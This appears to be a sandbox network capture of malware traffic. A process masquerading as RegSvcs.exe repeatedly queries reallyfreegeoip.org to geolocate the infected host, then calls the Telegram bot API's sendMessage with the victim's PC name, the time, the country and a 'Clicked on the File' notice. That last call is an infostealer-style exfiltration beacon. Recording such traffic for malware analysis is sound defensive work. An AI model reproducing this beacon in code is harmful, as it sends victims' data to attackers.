                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1451&min_rtt=1439&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1899804&cwnd=148&unsent_bytes=0&cid=c59edc80b6d27e15&ts=196&x=0"
                                                                                                                      2025-01-03 08:49:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.549706188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:01 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-03 08:49:01 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:01 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208931
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kRO7i%2Fj1Q4XE7CCOEruLZgcRiSnlayVj%2Fs9pEkojH0Vk9V1Lw24C6ZuPiT1CwAL1%2BUWtN%2BHCG8tN5H83XhETRnH35EIjzUhtQQSqJTeB0crlh8oraWH0FEKiiN2DA5MkY6b6maJ1"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbb319d54380-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1608&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1771844&cwnd=223&unsent_bytes=0&cid=2634ac3310e75f9d&ts=136&x=0"
                                                                                                                      2025-01-03 08:49:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.549708188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-03 08:49:03 UTC863INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:03 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208932
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cNA6wZj6%2Br%2BNEA1v52gpYJTWHvxIduC6l%2Bcjh9rbPvUUnt8yH5TzqUg%2F%2F%2BPNtRcuMzbXVtntCUnU99RAgmx8OScE%2FRCzoFhbLerj5b8g14k7BDbmuWPoZfqdpSxvjPIVroSQiFy1"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbbb5e227c78-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1774&rtt_var=679&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1594756&cwnd=252&unsent_bytes=0&cid=f7d1c73907e0cdfa&ts=159&x=0"
                                                                                                                      2025-01-03 08:49:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.549710188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:04 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-03 08:49:04 UTC863INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:04 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208933
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEC1Cs00iQPtRa0VWZvBjyYx%2B%2B%2B4GbQvwwvix2%2FX0OtBwvFXzoWidQqgH5O7ZwMpy5de1A2niJXv2QpS%2BOd01TuoD9%2FkmKwI8eOhrfD3VMgyLrsAzSVX9njHCe8%2BJGJn6OKEi5t7"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbc39d0df5f6-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1558&rtt_var=631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1672394&cwnd=183&unsent_bytes=0&cid=953c6e8999885ed0&ts=131&x=0"
                                                                                                                      2025-01-03 08:49:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.549712188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:05 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-03 08:49:05 UTC853INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:05 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208935
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nyQ1u4RpW8mlIhTBFOkMLImSg2Qd2Ugw9MUIG9lX6YPYRML0f6NpWHiEHFJ3fmiSFextAbDGYYbtXEy6p3uKa7Sg%2FEcKubCBBeleMYC2O6SqppBbMHNCpXWqSnEaXu%2FZNynqEWkG"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbcbcfecc47c-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1466&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1940199&cwnd=210&unsent_bytes=0&cid=5781d2f59eb75d33&ts=147&x=0"
                                                                                                                      2025-01-03 08:49:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.549714188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:07 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-03 08:49:07 UTC851INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:07 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208936
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7w3H2yrRbd3Yr7EAhXGCbwuu3if8DCwA84QXt7l225D3mk80Yzn6Dt8%2FSbVbuAicNt5HvfzE7PDmkyUbEBspFWx4kau0cg3aZqsnNK4Rmn7YcmNEdc6uW8oSRQ2WFPQjfQP2xPXY"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbd429c5c335-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2105&min_rtt=1650&rtt_var=1530&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=551255&cwnd=165&unsent_bytes=0&cid=79be6a08c74eefea&ts=155&x=0"
                                                                                                                      2025-01-03 08:49:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.549716188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:08 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-03 08:49:08 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:08 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208937
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=te21Q%2FB1PRpA7O7ovdsAKnOAQRKTMKxwbfQ%2FO7RyIyBlJVj%2B5oMafMEl8zFO9htqipfxqlcjL%2F7BW30qj1kDfwihHiBPf250oeiWD4hv0jQTMIsEMIvopHKMYw0BPVEeGnRY1%2FMt"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbdc5c29436f-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1823860&cwnd=182&unsent_bytes=0&cid=b8aa97ab71ee4f17&ts=147&x=0"
                                                                                                                      2025-01-03 08:49:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.549718188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:09 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-03 08:49:09 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:09 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208939
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sxASkkePp4ZMVuJTC%2BshcyNxVADAJLmPbDzhjKEbTbLs25u%2FrWJLHKm8Q12JMxnZAeJHGoGS8%2BfnsTm8piBXpkLLu%2BvKifcKppfUN1nsBhdVUmsNSqUKuxWgPU1ZpxS%2BCf0lppEe"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbe4fcac43c9-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1983&rtt_var=762&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1419543&cwnd=230&unsent_bytes=0&cid=e38db9e22bb544f2&ts=143&x=0"
                                                                                                                      2025-01-03 08:49:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.549720188.114.97.34436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-03 08:49:11 UTC853INHTTP/1.1 200 OK
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:11 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1208940
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CThwt4ZQfRr3xSrVmamBU495XaxaS2k8r2z3%2FlljuBHkibm5CwBaM0VDnayiUQwy2mroyb1mM6b6BIAXd11qHz9SgCyT0TclopeuAdl7ZzhrxtnrwlqjP5QxK0hGbhwv87w%2B2VZ0"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fc1bbed485319a1-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1907&rtt_var=736&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1465863&cwnd=118&unsent_bytes=0&cid=c27104655cc2aa77&ts=146&x=0"
                                                                                                                      2025-01-03 08:49:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.549721149.154.167.2204436504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-03 08:49:11 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2003/01/2025%20/%2015:43:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-03 08:49:12 UTC344INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Fri, 03 Jan 2025 08:49:12 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
